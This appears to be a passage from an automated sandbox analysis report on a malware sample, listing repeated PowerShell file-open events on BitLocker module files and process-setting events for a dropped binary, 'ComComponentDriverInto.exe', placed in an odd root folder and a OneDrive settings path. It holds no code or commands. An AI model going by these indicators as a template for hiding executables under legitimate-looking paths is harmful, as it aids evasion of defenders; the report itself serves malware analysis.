                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
